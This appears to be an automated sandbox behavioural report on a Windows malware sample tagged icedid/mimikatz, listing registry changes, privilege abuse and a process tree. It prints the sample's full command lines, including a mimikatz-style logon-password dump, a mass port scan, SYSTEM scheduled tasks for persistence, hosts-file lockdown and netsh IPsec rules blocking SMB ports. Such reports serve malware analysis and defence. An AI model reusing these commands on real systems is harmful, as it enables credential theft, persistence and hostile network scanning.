\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bdltnuisb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ysesbhsym.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lebulsi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lebulsi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3084 cmd.exe 1476 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000a000000023b73-6.dat nsis_installer_2 behavioral2/files/0x000b000000023b8a-15.dat nsis_installer_1 behavioral2/files/0x000b000000023b8a-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing lebulsi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" lebulsi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" lebulsi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ lebulsi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" lebulsi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" lebulsi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" lebulsi.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1476 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5056 schtasks.exe 872 schtasks.exe 376 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4496 2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 4496 2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4320 lebulsi.exe Token: SeDebugPrivilege 4508 lebulsi.exe Token: SeDebugPrivilege 2280 vfshost.exe Token: SeDebugPrivilege 4668 sadefbibf.exe Token: SeLockMemoryPrivilege 4424 uuetgf.exe Token: SeLockMemoryPrivilege 4424 uuetgf.exe Token: SeDebugPrivilege 4780 sadefbibf.exe Token: SeDebugPrivilege 2448 sadefbibf.exe Token: SeDebugPrivilege 4032 sadefbibf.exe Token: SeDebugPrivilege 4152 sadefbibf.exe Token: SeDebugPrivilege 4928 sadefbibf.exe Token: SeDebugPrivilege 516 sadefbibf.exe Token: SeDebugPrivilege 1640 sadefbibf.exe Token: SeDebugPrivilege 828 sadefbibf.exe Token: SeDebugPrivilege 4636 sadefbibf.exe Token: SeDebugPrivilege 872 sadefbibf.exe Token: SeDebugPrivilege 704 sadefbibf.exe Token: SeDebugPrivilege 1296 sadefbibf.exe Token: SeDebugPrivilege 1544 sadefbibf.exe Token: SeDebugPrivilege 2760 sadefbibf.exe Token: SeDebugPrivilege 2100 sadefbibf.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 4496 2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe 4496 2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe 4320 lebulsi.exe 4320 lebulsi.exe 4508 lebulsi.exe 4508 lebulsi.exe 3356 xohudmc.exe 1060 zefhau.exe 4436 lebulsi.exe 4436 lebulsi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4496 wrote to memory of 3084 4496 2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe 84 PID 4496 wrote to memory of 3084 4496 2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe 84 PID 4496 wrote to memory of 3084 4496 2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe 84 PID 3084 wrote to memory of 1476 3084 cmd.exe 87 PID 3084 wrote to memory of 1476 3084 cmd.exe 87 PID 3084 wrote to memory of 1476 3084 cmd.exe 87 PID 3084 wrote to memory of 4320 3084 cmd.exe 94 PID 3084 wrote to memory of 4320 3084 cmd.exe 94 PID 3084 wrote to memory of 4320 3084 cmd.exe 94 PID 4508 wrote to memory of 4500 4508 lebulsi.exe 96 PID 4508 wrote to memory of 4500 4508 lebulsi.exe 96 PID 4508 wrote to memory of 4500 4508 lebulsi.exe 96 PID 4500 wrote to memory of 1688 4500 cmd.exe 98 PID 4500 wrote to memory of 1688 4500 cmd.exe 98 PID 4500 wrote to memory of 1688 4500 cmd.exe 98 PID 4500 wrote to memory of 1424 4500 cmd.exe 99 PID 4500 wrote to memory of 1424 4500 cmd.exe 99 PID 4500 wrote to memory of 1424 4500 cmd.exe 99 PID 4500 wrote to memory of 2476 4500 cmd.exe 100 PID 4500 wrote to memory of 2476 4500 cmd.exe 100 PID 4500 wrote to memory of 2476 4500 cmd.exe 100 PID 4500 wrote to memory of 2632 4500 cmd.exe 101 PID 4500 wrote to memory of 2632 4500 cmd.exe 101 PID 4500 wrote to memory of 2632 4500 cmd.exe 101 PID 4500 wrote to memory of 3548 4500 cmd.exe 102 PID 4500 wrote to memory of 3548 4500 cmd.exe 102 PID 4500 wrote to memory of 3548 4500 cmd.exe 102 PID 4500 wrote to memory of 1520 4500 cmd.exe 103 PID 4500 wrote to memory of 1520 4500 cmd.exe 103 PID 4500 wrote to memory of 1520 4500 cmd.exe 103 PID 4508 wrote to memory of 624 4508 lebulsi.exe 107 PID 4508 wrote to memory of 624 4508 lebulsi.exe 107 PID 4508 wrote to memory of 624 4508 lebulsi.exe 107 PID 4508 wrote to memory of 2660 4508 lebulsi.exe 109 PID 4508 wrote to memory of 2660 4508 lebulsi.exe 109 PID 4508 wrote to memory of 2660 4508 lebulsi.exe 109 PID 4508 wrote to memory of 4912 4508 lebulsi.exe 111 PID 4508 wrote to memory of 4912 4508 lebulsi.exe 111 PID 4508 wrote to memory of 4912 4508 lebulsi.exe 111 PID 4508 wrote to memory of 1756 4508 lebulsi.exe 115 PID 4508 wrote to memory of 1756 4508 lebulsi.exe 115 PID 4508 wrote to memory of 1756 4508 lebulsi.exe 115 PID 1756 wrote to memory of 3460 1756 cmd.exe 117 PID 1756 wrote to memory of 3460 1756 cmd.exe 117 PID 1756 wrote to memory of 3460 1756 cmd.exe 117 PID 3460 wrote to memory of 3584 3460 wpcap.exe 118 PID 3460 wrote to memory of 3584 3460 wpcap.exe 118 PID 3460 wrote to memory of 3584 3460 wpcap.exe 118 PID 3584 wrote to memory of 936 3584 net.exe 120 PID 3584 wrote to memory of 936 3584 net.exe 120 PID 3584 wrote to memory of 936 3584 net.exe 120 PID 3460 wrote to memory of 2408 3460 wpcap.exe 121 PID 3460 wrote to memory of 2408 3460 wpcap.exe 121 PID 3460 wrote to memory of 2408 3460 wpcap.exe 121 PID 2408 wrote to memory of 2976 2408 net.exe 123 PID 2408 wrote to memory of 2976 2408 net.exe 123 PID 2408 wrote to memory of 2976 2408 net.exe 123 PID 3460 wrote to memory of 1796 3460 wpcap.exe 124 PID 3460 wrote to memory of 1796 3460 wpcap.exe 124 PID 3460 wrote to memory of 1796 3460 wpcap.exe 124 PID 1796 wrote to memory of 5048 1796 net.exe 126 PID 1796 wrote to memory of 5048 1796 net.exe 126 PID 1796 wrote to memory of 5048 1796 net.exe 126 PID 3460 wrote to memory of 3160 3460 wpcap.exe 127
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1736
-
C:\Windows\TEMP\eyuduassi\uuetgf.exe"C:\Windows\TEMP\eyuduassi\uuetgf.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-14_b94dd0f9743e238e5f43aab46e34ba41_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\seumlgyb\lebulsi.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1476
-
-
C:\Windows\seumlgyb\lebulsi.exeC:\Windows\seumlgyb\lebulsi.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4320
-
-
-
C:\Windows\seumlgyb\lebulsi.exeC:\Windows\seumlgyb\lebulsi.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4508 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1688
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:1424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2476
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3548
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:1520
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:624
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2660
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4912
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\zthyliniv\eftbbbiir\wpcap.exeC:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:936
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2976
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:5048
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:3160
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:3212
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4168 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4320 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3404
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:5032 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1200 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3200
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:1560 -
C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exeC:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\zthyliniv\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3352 -
C:\Windows\zthyliniv\Corporate\vfshost.exeC:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4852 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:376
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"2⤵PID:2656
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1472 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5056
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3144
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2084
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2864
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4588
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1544
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3544
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3652
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1656
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3176
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
